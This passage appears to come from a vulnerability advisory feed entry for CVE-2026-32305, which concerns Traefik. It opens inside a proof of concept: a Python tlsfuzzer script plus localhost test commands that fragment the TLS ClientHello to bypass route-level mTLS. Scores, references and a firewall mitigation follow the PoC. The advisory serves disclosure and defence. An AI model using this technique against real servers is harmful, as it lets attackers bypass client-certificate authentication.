X509CertChain\n\n\nclass PrettyExpectApplicationData(ExpectApplicationData):\n def process(self, state, msg):\n super().process(state, msg)\n text = msg.write().decode(\"utf-8\", errors=\"replace\")\n head, _, body = text.partition(\"\\r\\n\\r\\n\")\n print(\"\\n=== HTTP RESPONSE ===\")\n print(head)\n print()\n print(body)\n print(\"=== END HTTP RESPONSE ===\\n\")\n\n\ndef load_client_cert_and_key(cert_path, key_path):\n cert = None\n key = None\n\n if cert_path:\n text_cert = open(cert_path, \"rb\").read()\n if sys.version_info[0] >= 3:\n text_cert = str(text_cert, \"utf-8\")\n cert = X509()\n cert.parse(text_cert)\n\n if key_path:\n text_key = open(key_path, \"rb\").read()\n if sys.version_info[0] >= 3:\n text_key = str(text_key, \"utf-8\")\n key = parsePEMKey(text_key, private=True)\n\n return cert, key\n\n\ndef main():\n p = argparse.ArgumentParser()\n p.add_argument(\"--connect-host\", default=\"127.0.0.1\")\n p.add_argument(\"--port\", type=int, default=8443)\n p.add_argument(\"--sni\", default=\"whoami.home.arpa\")\n p.add_argument(\"--record-size\", type=int, default=512)\n p.add_argument(\"--padding-len\", type=int, default=1200)\n p.add_argument(\"--expect-cert-request\", action=\"store_true\")\n p.add_argument(\"--client-cert-pem\", default=\"\")\n p.add_argument(\"--client-key-pem\", default=\"\")\n args = p.parse_args()\n\n cert, key = load_client_cert_and_key(args.client_cert_pem, args.client_key_pem)\n\n print(f\"[DBG] cert_arg={args.client_cert_pem!r} key_arg={args.client_key_pem!r}\")\n for p in [args.client_cert_pem, args.client_key_pem]:\n if p:\n print(f\"[DBG] file={p} exists={os.path.exists(p)} size={os.path.getsize(p) if os.path.exists(p) else -1}\")\n\n print(f\"[DBG] cert_loaded={cert is not None} key_loaded={key is not None}\")\n print(f\"[DBG] bool(cert)={bool(cert) if cert is not None else None} bool(key)={bool(key) if key is not None else None}\")\n\n\n if (args.client_cert_pem or args.client_key_pem) and not (cert and key):\n raise ValueError(\"Provide both --client-cert-pem and --client-key-pem\")\n\n conv = Connect(args.connect_host, args.port)\n node = conv\n node = node.add_child(SetMaxRecordSize(args.record_size))\n\n ext = {\n ExtensionType.server_name: SNIExtension().create(bytearray(args.sni, \"ascii\")),\n ExtensionType.supported_groups: SupportedGroupsExtension().create(\n [GroupName.secp256r1, GroupName.ffdhe2048]\n ),\n ExtensionType.signature_algorithms: SignatureAlgorithmsExtension().create(SIG_ALL),\n ExtensionType.signature_algorithms_cert: SignatureAlgorithmsCertExtension().create(SIG_ALL),\n 21: TLSExtension().create(21, bytearray(args.padding_len)),\n }\n\n ciphers = [\n CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,\n CipherSuite.TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,\n CipherSuite.TLS_DHE_RSA_WITH_AES_128_CBC_SHA,\n CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV,\n ]\n\n node = node.add_child(ClientHelloGenerator(ciphers, extensions=ext))\n node = node.add_child(ExpectServerHello())\n node = node.add_child(ExpectCertificate())\n node = node.add_child(ExpectServerKeyExchange())\n\n if args.expect_cert_request:\n node = node.add_child(ExpectCertificateRequest())\n\n node = node.add_child(ExpectServerHelloDone())\n\n if args.expect_cert_request and cert and key:\n node = node.add_child(CertificateGenerator(X509CertChain([cert])))\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(CertificateVerifyGenerator(key))\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n req = bytearray(\n f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n )\n node = node.add_child(ApplicationDataGenerator(req))\n node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n node = node.add_child(ExpectAlert())\n node.next_sibling = ExpectClose()\n\n elif args.expect_cert_request and not (cert and key):\n node = node.add_child(CertificateGenerator())\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n\n else:\n node = node.add_child(ClientKeyExchangeGenerator())\n node = node.add_child(ChangeCipherSpecGenerator())\n node = node.add_child(FinishedGenerator())\n node = node.add_child(ExpectChangeCipherSpec())\n node = node.add_child(ExpectFinished())\n req = bytearray(\n f\"GET / HTTP/1.1\\r\\nHost: {args.sni}\\r\\nConnection: close\\r\\n\\r\\n\".encode(\"ascii\")\n )\n node = node.add_child(ApplicationDataGenerator(req))\n node = node.add_child(PrettyExpectApplicationData(output=sys.stdout))\n node = node.add_child(AlertGenerator(AlertLevel.warning, AlertDescription.close_notify))\n node = node.add_child(ExpectAlert())\n node.next_sibling = ExpectClose()\n\n try:\n Runner(conv).run()\n print(\"[OK] conversation completed\")\n except AssertionError as e:\n print(f\"[TLS RAW ERROR] {e}\")\n marker = \"Unexpected message from peer: \"\n s = str(e)\n if marker in s:\n print(f\"[TLS PEER MESSAGE] {s.split(marker, 1)[1].strip()}\")\n raise\n\n\nif __name__ == \"__main__\":\n main()\nEOF_FRAG_SCRIPT\n\nchmod +x frag_clienthello.py\ncd /tmp/testtlsfuzz/tlsfuzzer\nsource .venv/bin/activate\n\n# case 1: non fragmented, no client cert (strict mTLS path, should fail. traefik logs should inform that client didn't provide a certificate)\npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 16384 \\\n --expect-cert-request\n\n# case 1b with openssl instead of my script\nprintf 'GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n' | \\\nopenssl s_client \\\n -connect 127.0.0.1:8443 \\\n -servername whoami.home.arpa \\\n -tls1_2 \\\n -CAfile /tmp/traefik-frag-poc/certs/ca.crt \\\n -state -msg -tlsextdebug -verify_return_error\n\n\n# case 2: non fragmented, with valid client cert (should succeed) \npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 16384 \\\n --expect-cert-request \\\n --client-cert-pem /tmp/traefik-frag-poc/certs/client.crt \\\n --client-key-pem /tmp/traefik-frag-poc/certs/client.key\n\n# case 2b with openssl instead of my script\nprintf 'GET / HTTP/1.1\\r\\nHost: whoami.home.arpa\\r\\nConnection: close\\r\\n\\r\\n' | \\\nopenssl s_client -connect 127.0.0.1:8443 -servername whoami.home.arpa -tls1_2 \\\n -cert /tmp/traefik-frag-poc/certs/client.crt \\\n -key /tmp/traefik-frag-poc/certs/client.key \\\n -CAfile /tmp/traefik-frag-poc/certs/ca.crt -quiet\n\n# case 3 fragmented ClientHello, no client cert (bypass behavior test)\npython frag_clienthello.py \\\n --connect-host 127.0.0.1 \\\n --port 8443 \\\n --sni whoami.home.arpa \\\n --record-size 500\n# in the record-size you can play with it as long as the client hello sni sniff function returns an EOF\n```\n\n### Impact\nAn attacker can bypass route-level mTLS enforcement by fragmenting ClientHello so Traefik pre-sniff fails (EOF) and falls back to default permissive TLS config.\n\n \n\n--",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-wvvq-wgcr-9q48.json?alt=media"
},
{
"category": "description",
"text": "Traefik has a Potential mTLS Bypass via Fragmented TLS ClientHello Causing Pre-SNI Sniff Fallback to Default Non-mTLS TLS Config in github.com/traefik/traefik",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4793.json?alt=media"
},
{
"category": "other",
"text": "0.00046",
"title": "EPSS"
},
{
"category": "other",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N",
"title": "CVSSV4"
},
{
"category": "other",
"text": "7.8",
"title": "CVSSV4 base score"
},
{
"category": "other",
"text": "5.3",
"title": "NCSC Score"
},
{
"category": "other",
"text": "Is related to an uncommon cwe id",
"title": "NCSC Score top increasing factors"
},
{
"category": "details",
"text": "Severity: 3\n",
"title": "Vendor assessment"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5874588",
"CSAFPID-5874589",
"CSAFPID-5874590",
"CSAFPID-1439281",
"CSAFPID-1441150",
"CSAFPID-1496379",
"CSAFPID-2485335",
"CSAFPID-5902892",
"CSAFPID-5902893",
"CSAFPID-5241306",
"CSAFPID-5907230",
"CSAFPID-5907231"
]
},
"references": [
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32305.json"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32305"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Source - github",
"url": "https://api.github.com/advisories/GHSA-wvvq-wgcr-9q48"
},
{
"category": "external",
"summary": "Source - redhat",
"url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-32305.json"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-wvvq-wgcr-9q48.json?alt=media"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4793.json?alt=media"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-wvvq-wgcr-9q48"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.41"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/releases/tag/v3.6.11"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv; redhat",
"url": "https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2"
},
{
"category": "external",
"summary": "Reference - github; osv; redhat",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32305"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://github.com/advisories/GHSA-wvvq-wgcr-9q48"
},
{
"category": "external",
"summary": "Reference - redhat",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32305"
}
],
"remediations": [
{
"category": "mitigation",
"details": "To mitigate unauthorized access, restrict network access to the Traefik instance to only trusted clients and networks. Implement firewall rules to limit inbound connections to the ports Traefik listens on for mTLS-protected services. For example, using `firewalld`, specific source IP addresses or networks can be allowed. After applying firewall rules, ensure the firewall service is reloaded for changes to take effect. This reduces the attack surface by preventing untrusted external access to the Traefik instance.",
"product_ids": [
"CSAFPID-1439281",
"CSAFPID-1441150",
"CSAFPID-1496379",
"CSAFPID-2485335"
]
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"baseScore": 8.3,
"baseSeverity": "HIGH"
},
"products": [
"CSAFPID-1439281",
"CSAFPID-1441150",
"CSAFPID-1496379",
"CSAFPID-2485335",
"CSAFPID-5241306",
"CSAFPID-5874588",
"CSAFPID-5874589",
"CSAFPID-5874590",
"CSAFPID-5902892",
"CSAFPID-5902893",
"CSAFPID-5907230",
"CSAFPID-5907231"
]
}
],
"title": "CVE-2026-32305"
}
]
}